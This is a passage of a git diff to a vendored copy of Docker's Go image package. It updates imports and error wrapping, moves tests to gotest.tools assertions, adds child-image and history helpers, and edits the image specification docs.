&container.Config{ExposedPorts: ports1}: {ExposedPorts: ports3}, + {ExposedPorts: ports1}: {ExposedPorts: ports3}, // only entrypoints - &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint2}, + {Entrypoint: entrypoint1}: {Entrypoint: entrypoint2}, // not the same number of parts - &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint3}, + {Entrypoint: entrypoint1}: {Entrypoint: entrypoint3}, // only volumes - &container.Config{Volumes: volumes1}: {Volumes: volumes2}, + {Volumes: volumes1}: {Volumes: volumes2}, // not the same number of labels - &container.Config{Volumes: volumes1}: {Volumes: volumes3}, + {Volumes: volumes1}: {Volumes: volumes3}, } for config1, config2 := range sameConfigs { - if !Compare(config1, config2) { + if !compare(config1, config2) { t.Fatalf("Compare should be true for [%v] and [%v]", config1, config2) } } for config1, config2 := range differentConfigs { - if Compare(config1, config2) { + if compare(config1, config2) { t.Fatalf("Compare should be false for [%v] and [%v]", config1, config2) } } diff --git a/vendor/github.com/docker/docker/image/fs.go b/vendor/github.com/docker/docker/image/fs.go index 39cfbf5d74..7080c8c015 100644 --- a/vendor/github.com/docker/docker/image/fs.go +++ b/vendor/github.com/docker/docker/image/fs.go @@ -1,4 +1,4 @@ -package image +package image // import "github.com/docker/docker/image" import ( "fmt" @@ -7,9 +7,10 @@ import ( "path/filepath" "sync" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/pkg/ioutils" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // DigestWalkFunc is function called by StoreBackend.Walk @@ -47,10 +48,10 @@ func newFSStore(root string) (*fs, error) { root: root, } if err := os.MkdirAll(filepath.Join(root, contentDirName, string(digest.Canonical)), 0700); err != nil { - return nil, err + return nil, errors.Wrap(err, "failed to create storage backend") } if err := os.MkdirAll(filepath.Join(root, metadataDirName, string(digest.Canonical)), 0700); err != nil { - return nil, err + return nil, errors.Wrap(err, "failed to create storage backend") } return s, nil } @@ -75,7 +76,7 @@ func (s *fs) Walk(f DigestWalkFunc) error { for _, v := range dir { dgst := digest.NewDigestFromHex(string(digest.Canonical), v.Name()) if err := dgst.Validate(); err != nil { - logrus.Debugf("Skipping invalid digest %s: %s", dgst, err) + logrus.Debugf("skipping invalid digest %s: %s", dgst, err) continue } if err := f(dgst); err != nil { @@ -96,7 +97,7 @@ func (s *fs) Get(dgst digest.Digest) ([]byte, error) { func (s *fs) get(dgst digest.Digest) ([]byte, error) { content, err := ioutil.ReadFile(s.contentFile(dgst)) if err != nil { - return nil, err + return nil, errors.Wrapf(err, "failed to get digest %s", dgst) } // todo: maybe optional @@ -113,12 +114,12 @@ func (s *fs) Set(data []byte) (digest.Digest, error) { defer s.Unlock() if len(data) == 0 { - return "", fmt.Errorf("Invalid empty data") + return "", fmt.Errorf("invalid empty data") } dgst := digest.FromBytes(data) if err := ioutils.AtomicWriteFile(s.contentFile(dgst), data, 0600); err != nil { - return "", err + return "", errors.Wrap(err, "failed to write digest data") } return dgst, nil @@ -132,10 +133,7 @@ func (s *fs) Delete(dgst digest.Digest) error { if err := os.RemoveAll(s.metadataDir(dgst)); err != nil { return err } - if err := os.Remove(s.contentFile(dgst)); err != nil { - return err - } - return nil + return os.Remove(s.contentFile(dgst)) } // SetMetadata sets metadata for a given ID. It fails if there's no base file. @@ -161,7 +159,11 @@ func (s *fs) GetMetadata(dgst digest.Digest, key string) ([]byte, error) { if _, err := s.get(dgst); err != nil { return nil, err } - return ioutil.ReadFile(filepath.Join(s.metadataDir(dgst), key)) + bytes, err := ioutil.ReadFile(filepath.Join(s.metadataDir(dgst), key)) + if err != nil { + return nil, errors.Wrap(err, "failed to read metadata") + } + return bytes, nil } // DeleteMetadata removes the metadata associated with a digest. diff --git a/vendor/github.com/docker/docker/image/fs_test.go b/vendor/github.com/docker/docker/image/fs_test.go index 8d602d97eb..6290c2b66e 100644 --- a/vendor/github.com/docker/docker/image/fs_test.go +++ b/vendor/github.com/docker/docker/image/fs_test.go @@ -1,7 +1,6 @@ -package image +package image // import "github.com/docker/docker/image" import ( - "bytes" "crypto/rand" "crypto/sha256" "encoding/hex" @@ -11,79 +10,52 @@ import ( "path/filepath" "testing" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -func TestFSGetSet(t *testing.T) { +func defaultFSStoreBackend(t *testing.T) (StoreBackend, func()) { tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) - testGetSet(t, fs) + fsBackend, err := NewFSStoreBackend(tmpdir) + assert.Check(t, err) + + return fsBackend, func() { os.RemoveAll(tmpdir) } } func TestFSGetInvalidData(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() - id, err := fs.Set([]byte("foobar")) - if err != nil { - t.Fatal(err) - } + id, err := store.Set([]byte("foobar")) + assert.Check(t, err) dgst := digest.Digest(id) - if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, string(dgst.Algorithm()), dgst.Hex()), []byte("foobar2"), 0600); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(store.(*fs).root, contentDirName, string(dgst.Algorithm()), dgst.Hex()), []byte("foobar2"), 0600) + assert.Check(t, err) - _, err = fs.Get(id) - if err == nil { - t.Fatal("Expected get to fail after data modification.") - } + _, err = store.Get(id) + assert.Check(t, is.ErrorContains(err, "failed to verify")) } func TestFSInvalidSet(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() id := digest.FromBytes([]byte("foobar")) - err = os.Mkdir(filepath.Join(tmpdir, contentDirName, string(id.Algorithm()), id.Hex()), 0700) - if err != nil { - t.Fatal(err) - } + err := os.Mkdir(filepath.Join(store.(*fs).root, contentDirName, string(id.Algorithm()), id.Hex()), 0700) + assert.Check(t, err) - _, err = fs.Set([]byte("foobar")) - if err == nil { - t.Fatal("Expecting error from invalid filesystem data.") - } + _, err = store.Set([]byte("foobar")) + assert.Check(t, is.ErrorContains(err, "failed to write digest data")) } func TestFSInvalidRoot(t *testing.T) { tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) defer os.RemoveAll(tmpdir) tcases := []struct { @@ -98,34 +70,29 @@ func TestFSInvalidRoot(t *testing.T) { root := filepath.Join(tmpdir, tc.root) filePath := filepath.Join(tmpdir, tc.invalidFile) err := os.MkdirAll(filepath.Dir(filePath), 0700) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + f, err := os.Create(filePath) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) f.Close() _, err = NewFSStoreBackend(root) - if err == nil { - t.Fatalf("Expected error from root %q and invlid file %q", tc.root, tc.invalidFile) - } + assert.Check(t, is.ErrorContains(err, "failed to create storage backend")) os.RemoveAll(root) } } -func testMetadataGetSet(t *testing.T, store StoreBackend) { +func TestFSMetadataGetSet(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + id, err := store.Set([]byte("foo")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + id2, err := store.Set([]byte("bar")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) tcases := []struct { id digest.Digest @@ -139,115 +106,49 @@ func testMetadataGetSet(t *testing.T, store StoreBackend) { for _, tc := range tcases { err = store.SetMetadata(tc.id, tc.key, tc.value) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) actual, err := store.GetMetadata(tc.id, tc.key) - if err != nil { - t.Fatal(err) - } - if bytes.Compare(actual, tc.value) != 0 { - t.Fatalf("Metadata expected %q, got %q", tc.value, actual) - } + assert.Check(t, err) + + assert.Check(t, is.DeepEqual(tc.value, actual)) } _, err = store.GetMetadata(id2, "tkey2") - if err == nil { - t.Fatal("Expected error for getting metadata for unknown key") - } + assert.Check(t, is.ErrorContains(err, "failed to read metadata")) id3 := digest.FromBytes([]byte("baz")) err = store.SetMetadata(id3, "tkey", []byte("tval")) - if err == nil { - t.Fatal("Expected error for setting metadata for unknown ID.") - } + assert.Check(t, is.ErrorContains(err, "failed to get digest")) _, err = store.GetMetadata(id3, "tkey") - if err == nil { - t.Fatal("Expected error for getting metadata for unknown ID.") - } -} - -func TestFSMetadataGetSet(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - testMetadataGetSet(t, fs) -} - -func TestFSDelete(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - testDelete(t, fs) -} - -func TestFSWalker(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - testWalker(t, fs) + assert.Check(t, is.ErrorContains(err, "failed to get digest")) } func TestFSInvalidWalker(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() - fooID, err := fs.Set([]byte("foo")) - if err != nil { - t.Fatal(err) - } + fooID, err := store.Set([]byte("foo")) + assert.Check(t, err) - if err := ioutil.WriteFile(filepath.Join(tmpdir, contentDirName, "sha256/foobar"), []byte("foobar"), 0600); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(store.(*fs).root, contentDirName, "sha256/foobar"), []byte("foobar"), 0600) + assert.Check(t, err) n := 0 - err = fs.Walk(func(id digest.Digest) error { - if id != fooID { - t.Fatalf("Invalid walker ID %q, expected %q", id, fooID) - } + err = store.Walk(func(id digest.Digest) error { + assert.Check(t, is.Equal(fooID, id)) n++ return nil }) - if err != nil { - t.Fatalf("Invalid data should not have caused walker error, got %v", err) - } - if n != 1 { - t.Fatalf("Expected 1 walk initialization, got %d", n) - } + assert.Check(t, err) + assert.Check(t, is.Equal(1, n)) } -func testGetSet(t *testing.T, store StoreBackend) { +func TestFSGetSet(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + type tcase struct { input []byte expected digest.Digest @@ -258,15 +159,13 @@ func testGetSet(t *testing.T, store StoreBackend) { randomInput := make([]byte, 8*1024) _, err := rand.Read(randomInput) - if err != nil { - t.Fatal(err) - } - // skipping use of digest pkg because its used by the implementation + assert.Check(t, err) + + // skipping use of digest pkg because it is used by the implementation h := sha256.New() _, err = h.Write(randomInput) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + tcases = append(tcases, tcase{ input: randomInput, expected: digest.Digest("sha256:" + hex.EncodeToString(h.Sum(nil))), @@ -274,83 +173,72 @@ func testGetSet(t *testing.T, store StoreBackend) { for _, tc := range tcases { id, err := store.Set([]byte(tc.input)) - if err != nil { - t.Fatal(err) - } - if id != tc.expected { - t.Fatalf("Expected ID %q, got %q", tc.expected, id) - } - } - - for _, emptyData := range [][]byte{nil, {}} { - _, err := store.Set(emptyData) - if err == nil { - t.Fatal("Expected error for nil input.") - } + assert.Check(t, err) + assert.Check(t, is.Equal(tc.expected, id)) } for _, tc := range tcases { data, err := store.Get(tc.expected) - if err != nil { - t.Fatal(err) - } - if bytes.Compare(data, tc.input) != 0 { - t.Fatalf("Expected data %q, got %q", tc.input, data) - } + assert.Check(t, err) + assert.Check(t, is.DeepEqual(tc.input, data)) } +} + +func TestFSGetUnsetKey(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() for _, key := range []digest.Digest{"foobar:abc", "sha256:abc", "sha256:c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2a"} { _, err := store.Get(key) - if err == nil { - t.Fatalf("Expected error for ID %q.", key) - } + assert.Check(t, is.ErrorContains(err, "failed to get digest")) } +} +func TestFSGetEmptyData(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + + for _, emptyData := range [][]byte{nil, {}} { + _, err := store.Set(emptyData) + assert.Check(t, is.ErrorContains(err, "invalid empty data")) + } } -func testDelete(t *testing.T, store StoreBackend) { +func TestFSDelete(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + id, err := store.Set([]byte("foo")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + id2, err := store.Set([]byte("bar")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) err = store.Delete(id) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) _, err = store.Get(id) - if err == nil { - t.Fatalf("Expected getting deleted item %q to fail", id) - } + assert.Check(t, is.ErrorContains(err, "failed to get digest")) + _, err = store.Get(id2) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) err = store.Delete(id2) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + _, err = store.Get(id2) - if err == nil { - t.Fatalf("Expected getting deleted item %q to fail", id2) - } + assert.Check(t, is.ErrorContains(err, "failed to get digest")) } -func testWalker(t *testing.T, store StoreBackend) { +func TestFSWalker(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + id, err := store.Set([]byte("foo")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + id2, err := store.Set([]byte("bar")) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) tcases := make(map[digest.Digest]struct{}) tcases[id] = struct{}{} @@ -361,24 +249,22 @@ func testWalker(t *testing.T, store StoreBackend) { n++ return nil }) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) + assert.Check(t, is.Equal(2, n)) + assert.Check(t, is.Len(tcases, 0)) +} - if n != 2 { - t.Fatalf("Expected 2 walk initializations, got %d", n) - } - if len(tcases) != 0 { - t.Fatalf("Expected empty unwalked set, got %+v", tcases) - } +func TestFSWalkerStopOnError(t *testing.T) { + store, cleanup := defaultFSStoreBackend(t) + defer cleanup() + + id, err := store.Set([]byte("foo")) + assert.Check(t, err) - // stop on error - tcases = make(map[digest.Digest]struct{}) + tcases := make(map[digest.Digest]struct{}) tcases[id] = struct{}{} err = store.Walk(func(id digest.Digest) error { - return errors.New("") + return errors.New("what") }) - if err == nil { - t.Fatalf("Exected error from walker.") - } + assert.Check(t, is.ErrorContains(err, "what")) } diff --git a/vendor/github.com/docker/docker/image/image.go b/vendor/github.com/docker/docker/image/image.go index 29a990a556..7e0646f072 100644 --- a/vendor/github.com/docker/docker/image/image.go +++ b/vendor/github.com/docker/docker/image/image.go @@ -1,13 +1,17 @@ -package image +package image // import "github.com/docker/docker/image" import ( "encoding/json" "errors" "io" + "runtime" + "strings" "time" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types/container" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" ) // ID is the content-addressable ID of an image. @@ -29,25 +33,25 @@ func IDFromDigest(digest digest.Digest) ID { // V1Image stores the V1 image configuration. type V1Image struct { - // ID a unique 64 character identifier of the image + // ID is a unique 64 character identifier of the image ID string `json:"id,omitempty"` - // Parent id of the image + // Parent is the ID of the parent image Parent string `json:"parent,omitempty"` - // Comment user added comment + // Comment is the commit message that was set when committing the image Comment string `json:"comment,omitempty"` - // Created timestamp when image was created + // Created is the timestamp at which the image was created Created time.Time `json:"created"` // Container is the id of the container used to commit Container string `json:"container,omitempty"` // ContainerConfig is the configuration of the container that is committed into the image ContainerConfig container.Config `json:"container_config,omitempty"` - // DockerVersion specifies version on which image is built + // DockerVersion specifies the version of Docker that was used to build the image DockerVersion string `json:"docker_version,omitempty"` - // Author of the image + // Author is the name of the author that was specified when committing the image Author string `json:"author,omitempty"` // Config is the configuration of the container received from the client Config *container.Config `json:"config,omitempty"` - // Architecture is the hardware that the image is build and runs on + // Architecture is the hardware that the image is built and runs on Architecture string `json:"architecture,omitempty"` // OS is the operating system used to build and run the image OS string `json:"os,omitempty"` @@ -92,6 +96,24 @@ func (img *Image) RunConfig() *container.Config { return img.Config } +// BaseImgArch returns the image's architecture. If not populated, defaults to the host runtime arch. +func (img *Image) BaseImgArch() string { + arch := img.Architecture + if arch == "" { + arch = runtime.GOARCH + } + return arch +} + +// OperatingSystem returns the image's operating system. If not populated, defaults to the host runtime OS. +func (img *Image) OperatingSystem() string { + os := img.OS + if os == "" { + os = runtime.GOOS + } + return os +} + // MarshalJSON serializes the image to JSON. It sorts the top-level keys so // that JSON that's been manipulated by a push/pull cycle with a legacy // registry won't end up with a different key order. @@ -110,15 +132,63 @@ func (img *Image) MarshalJSON() ([]byte, error) { return json.Marshal(c) } +// ChildConfig is the configuration to apply to an Image to create a new +// Child image. Other properties of the image are copied from the parent. +type ChildConfig struct { + ContainerID string + Author string + Comment string + DiffID layer.DiffID + ContainerConfig *container.Config + Config *container.Config +} + +// NewChildImage creates a new Image as a child of this image. +func NewChildImage(img *Image, child ChildConfig, platform string) *Image { + isEmptyLayer := layer.IsEmpty(child.DiffID) + var rootFS *RootFS + if img.RootFS != nil { + rootFS = img.RootFS.Clone() + } else { + rootFS = NewRootFS() + } + + if !isEmptyLayer { + rootFS.Append(child.DiffID) + } + imgHistory := NewHistory( + child.Author, + child.Comment, + strings.Join(child.ContainerConfig.Cmd, " "), + isEmptyLayer) + + return &Image{ + V1Image: V1Image{ + DockerVersion: dockerversion.Version, + Config: child.Config, + Architecture: img.BaseImgArch(), + OS: platform, + Container: child.ContainerID, + ContainerConfig: *child.ContainerConfig, + Author: child.Author, + Created: imgHistory.Created, + }, + RootFS: rootFS, + History: append(img.History, imgHistory), + OSFeatures: img.OSFeatures, + OSVersion: img.OSVersion, + } +} + // History stores build commands that were used to create an image type History struct { - // Created timestamp for build point + // Created is the timestamp at which the image was created Created time.Time `json:"created"` - // Author of the build point + // Author is the name of the author that was specified when committing the image Author string `json:"author,omitempty"` - // CreatedBy keeps the Dockerfile command used while building image. + // CreatedBy keeps the Dockerfile command used while building the image CreatedBy string `json:"created_by,omitempty"` - // Comment is custom message set by the user when creating the image. + // Comment is the commit message that was set when committing the image Comment string `json:"comment,omitempty"` // EmptyLayer is set to true if this history item did not generate a // layer. Otherwise, the history item is associated with the next @@ -126,7 +196,19 @@ type History struct { EmptyLayer bool `json:"empty_layer,omitempty"` } -// Exporter provides interface for exporting and importing images +// NewHistory creates a new history struct from arguments, and sets the created +// time to the current time in UTC +func NewHistory(author, comment, createdBy string, isEmptyLayer bool) History { + return History{ + Author: author, + Created: time.Now().UTC(), + CreatedBy: createdBy, + Comment: comment, + EmptyLayer: isEmptyLayer, + } +} + +// Exporter provides interface for loading and saving images type Exporter interface { Load(io.ReadCloser, io.Writer, bool) error // TODO: Load(net.Context, io.ReadCloser, <- chan StatusMessage) error @@ -141,7 +223,7 @@ func NewFromJSON(src []byte) (*Image, error) { return nil, err } if img.RootFS == nil { - return nil, errors.New("Invalid image JSON, no RootFS key.") + return nil, errors.New("invalid image JSON, no RootFS key") } img.rawJSON = src diff --git a/vendor/github.com/docker/docker/image/image_test.go b/vendor/github.com/docker/docker/image/image_test.go index 525023b813..981be0b68c 100644 --- a/vendor/github.com/docker/docker/image/image_test.go +++ b/vendor/github.com/docker/docker/image/image_test.go @@ -1,10 +1,17 @@ -package image +package image // import "github.com/docker/docker/image" import ( "encoding/json" + "runtime" "sort" "strings" "testing" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/layer" + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) const sampleImageJSON = `{ @@ -17,22 +24,15 @@ const sampleImageJSON = `{ } }` -func TestJSON(t *testing.T) { +func TestNewFromJSON(t *testing.T) { img, err := NewFromJSON([]byte(sampleImageJSON)) - if err != nil { - t.Fatal(err) - } - rawJSON := img.RawJSON() - if string(rawJSON) != sampleImageJSON { - t.Fatalf("Raw JSON of config didn't match: expected %+v, got %v", sampleImageJSON, rawJSON) - } + assert.NilError(t, err) + assert.Check(t, is.Equal(sampleImageJSON, string(img.RawJSON()))) } -func TestInvalidJSON(t *testing.T) { +func TestNewFromJSONWithInvalidJSON(t *testing.T) { _, err := NewFromJSON([]byte("{}")) - if err == nil { - t.Fatal("Expected JSON parse error") - } + assert.Check(t, is.Error(err, "invalid image JSON, no RootFS key")) } func TestMarshalKeyOrder(t *testing.T) { @@ -43,9 +43,7 @@ func TestMarshalKeyOrder(t *testing.T) { Architecture: "c", }, }) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) expectedOrder := []string{"architecture", "author", "comment"} var indexes []int @@ -57,3 +55,71 @@ func TestMarshalKeyOrder(t *testing.T) { t.Fatal("invalid key order in JSON: ", string(b)) } } + +func TestImage(t *testing.T) { + cid := "50a16564e727" + config := &container.Config{ + Hostname: "hostname", + Domainname: "domain", + User: "root", + } + os := runtime.GOOS + + img := &Image{ + V1Image: V1Image{ + Config: config, + }, + computedID: ID(cid), + } + + assert.Check(t, is.Equal(cid, img.ImageID())) + assert.Check(t, is.Equal(cid, img.ID().String())) + assert.Check(t, is.Equal(os, img.OperatingSystem())) + assert.Check(t, is.DeepEqual(config, img.RunConfig())) +} + +func TestImageOSNotEmpty(t *testing.T) { + os := "os" + img := &Image{ + V1Image: V1Image{ + OS: os, + }, + OSVersion: "osversion", + } + assert.Check(t, is.Equal(os, img.OperatingSystem())) +} + +func TestNewChildImageFromImageWithRootFS(t *testing.T) { + rootFS := NewRootFS() + rootFS.Append(layer.DiffID("ba5e")) + parent := &Image{ + RootFS: rootFS, + History: []History{ + NewHistory("a", "c", "r", false), + }, + } + childConfig := ChildConfig{ + DiffID: layer.DiffID("abcdef"), + Author: "author", + Comment: "comment", + ContainerConfig: &container.Config{ + Cmd: []string{"echo", "foo"}, + }, + Config: &container.Config{}, + } + + newImage := NewChildImage(parent, childConfig, "platform") + expectedDiffIDs := []layer.DiffID{layer.DiffID("ba5e"), layer.DiffID("abcdef")} + assert.Check(t, is.DeepEqual(expectedDiffIDs, newImage.RootFS.DiffIDs)) + assert.Check(t, is.Equal(childConfig.Author, newImage.Author)) + assert.Check(t, is.DeepEqual(childConfig.Config, newImage.Config)) + assert.Check(t, is.DeepEqual(*childConfig.ContainerConfig, newImage.ContainerConfig)) + assert.Check(t, is.Equal("platform", newImage.OS)) + assert.Check(t, is.DeepEqual(childConfig.Config, newImage.Config)) + + assert.Check(t, is.Len(newImage.History, 2)) + assert.Check(t, is.Equal(childConfig.Comment, newImage.History[1].Comment)) + + assert.Check(t, !cmp.Equal(parent.RootFS.DiffIDs, newImage.RootFS.DiffIDs), + "RootFS should be copied not mutated") +} diff --git a/vendor/github.com/docker/docker/image/rootfs.go b/vendor/github.com/docker/docker/image/rootfs.go index 7b24e3ed1e..84843e10c6 100644 --- a/vendor/github.com/docker/docker/image/rootfs.go +++ b/vendor/github.com/docker/docker/image/rootfs.go @@ -1,10 +1,10 @@ -package image +package image // import "github.com/docker/docker/image" import ( "runtime" - "github.com/Sirupsen/logrus" "github.com/docker/docker/layer" + "github.com/sirupsen/logrus" ) // TypeLayers is used for RootFS.Type for filesystems organized into layers. @@ -34,6 +34,14 @@ func (r *RootFS) Append(id layer.DiffID) { r.DiffIDs = append(r.DiffIDs, id) } +// Clone returns a copy of the RootFS +func (r *RootFS) Clone() *RootFS { + newRoot := NewRootFS() + newRoot.Type = r.Type + newRoot.DiffIDs = append(r.DiffIDs) + return newRoot +} + // ChainID returns the ChainID for the top layer in RootFS. func (r *RootFS) ChainID() layer.ChainID { if runtime.GOOS == "windows" && r.Type == typeLayersWithBase { diff --git a/vendor/github.com/docker/docker/image/spec/README.md b/vendor/github.com/docker/docker/image/spec/README.md new file mode 100644 index 0000000000..9769af781a --- /dev/null +++ b/vendor/github.com/docker/docker/image/spec/README.md @@ -0,0 +1,46 @@ +# Docker Image Specification v1. + +This directory contains documents about Docker Image Specification v1.X. + +The v1 file layout and manifests are no longer used in Moby and Docker, except in `docker save` and `docker load`. + +However, v1 Image JSON (`application/vnd.docker.container.image.v1+json`) has been still widely +used and officially adopted in [V2 manifest](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-2.md) +and in [OCI Image Format Specification](https://github.com/opencontainers/image-spec). + +## v1.X rough Changelog + +All 1.X versions are compatible with older ones. + +### [v1.2](v1.2.md) + +* Implemented in Docker v1.12 (July, 2016) +* The official spec document was written in August 2016 ([#25750](https://github.com/moby/moby/pull/25750)) + +Changes: + +* `Healthcheck` struct was added to Image JSON + +### [v1.1](v1.1.md) + +* Implemented in Docker v1.10 (February, 2016) +* The official spec document was written in April 2016 ([#22264](https://github.com/moby/moby/pull/22264)) + +Changes: + +* IDs were made into SHA256 digest values rather than random values +* Layer directory names were made into deterministic values rather than random ID values +* `manifest.json` was added + +### [v1](v1.md) + +* The initial revision +* The official spec document was written in late 2014 ([#9560](https://github.com/moby/moby/pull/9560)), but actual implementations had existed even earlier + + +## Related specifications + +* [Open Containers Initiative (OCI) Image Format Specification v1.0.0](https://github.com/opencontainers/image-spec/tree/v1.0.0) +* [Docker Image Manifest Version 2, Schema 2](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-2.md) +* [Docker Image Manifest Version 2, Schema 1](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-1.md) (*DEPRECATED*) +* [Docker Registry HTTP API V2](https://docs.docker.com/registry/spec/api/) diff --git a/vendor/github.com/docker/docker/image/spec/v1.1.md b/vendor/github.com/docker/docker/image/spec/v1.1.md index 83f138011d..de74d91a19 100644 --- a/vendor/github.com/docker/docker/image/spec/v1.1.md +++ b/vendor/github.com/docker/docker/image/spec/v1.1.md @@ -88,7 +88,7 @@ This specification uses the following terms: A tag serves to map a descriptive, user-given name to any single image ID. Tag values are limited to the set of characters [a-zA-Z0-9_.-], except they may not start with a . - or - character. Tags are limited to 127 characters. + or - character. Tags are limited to 128 characters.
Repository @@ -99,7 +99,7 @@ This specification uses the following terms: my-app:3.1.4, my-app is the Repository component of the name. A repository name is made up of slash-separated name components, optionally prefixed by a DNS hostname. The hostname - must follow comply with standard DNS rules, but may not contain + must comply with standard DNS rules, but may not contain _ characters. If a hostname is present, it may optionally be followed by a port number in the format :8080. Name components may contain lowercase characters, digits, and @@ -223,9 +223,7 @@ whitespace. It has been added to this example for clarity. container using the image. This field can be null, in which case any execution parameters should be specified at creation of the container. -

Container RunConfig Field Descriptions

-
User string @@ -234,9 +232,7 @@ whitespace. It has been added to this example for clarity.

The username or UID which the process in the container should run as. This acts as a default value to use when the value is not specified when creating a container.

-

All of the following are valid:

-
  • user
  • uid
  • @@ -245,7 +241,6 @@ whitespace. It has been added to this example for clarity.
  • uid:group
  • user:gid
-

If group/gid is not specified, the default group and supplementary groups of the given user/uid in /etc/passwd @@ -284,13 +279,11 @@ whitespace. It has been added to this example for clarity. map[string]struct{} and is represented in JSON as an object mapping its keys to an empty object. Here is an example: -

{
     "8080": {},
     "53/udp": {},
     "2356/tcp": {}
 }
- Its keys can be in the format of:
  • @@ -304,10 +297,8 @@ whitespace. It has been added to this example for clarity.
with the default protocol being "tcp" if not - specified. - - These values act as defaults and are merged with any specified - when creating a container. + specified. These values act as defaults and are merged with any + specified when creating a container.
Env array of strings @@ -367,7 +358,6 @@ whitespace. It has been added to this example for clarity. The rootfs key references the layer content addresses used by the image. This makes the image config hash depend on the filesystem hash. rootfs has two subkeys: -
  • type is usually set to layers. @@ -376,10 +366,7 @@ whitespace. It has been added to this example for clarity. diff_ids is an array of layer content hashes (DiffIDs), in order from bottom-most to top-most.
- - Here is an example rootfs section: -
"rootfs": {
   "diff_ids": [
     "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
@@ -396,7 +383,6 @@ whitespace. It has been added to this example for clarity.
         history is an array of objects describing the history of
         each layer. The array is ordered from bottom-most layer to top-most
         layer. The object has the following fields.
-
         
  • created: Creation time, expressed as a ISO-8601 formatted diff --git a/vendor/github.com/docker/docker/image/spec/v1.2.md b/vendor/github.com/docker/docker/image/spec/v1.2.md index 6c641cafec..2ea3feec92 100644 --- a/vendor/github.com/docker/docker/image/spec/v1.2.md +++ b/vendor/github.com/docker/docker/image/spec/v1.2.md @@ -88,7 +88,7 @@ This specification uses the following terms: A tag serves to map a descriptive, user-given name to any single image ID. Tag values are limited to the set of characters [a-zA-Z0-9_.-], except they may not start with a . - or - character. Tags are limited to 127 characters. + or - character. Tags are limited to 128 characters.
    Repository @@ -99,7 +99,7 @@ This specification uses the following terms: my-app:3.1.4, my-app is the Repository component of the name. A repository name is made up of slash-separated name components, optionally prefixed by a DNS hostname. The hostname - must follow comply with standard DNS rules, but may not contain + must comply with standard DNS rules, but may not contain _ characters. If a hostname is present, it may optionally be followed by a port number in the format :8080. Name components may contain lowercase characters, digits, and @@ -223,9 +223,7 @@ whitespace. It has been added to this example for clarity. container using the image. This field can be null, in which case any execution parameters should be specified at creation of the container. -

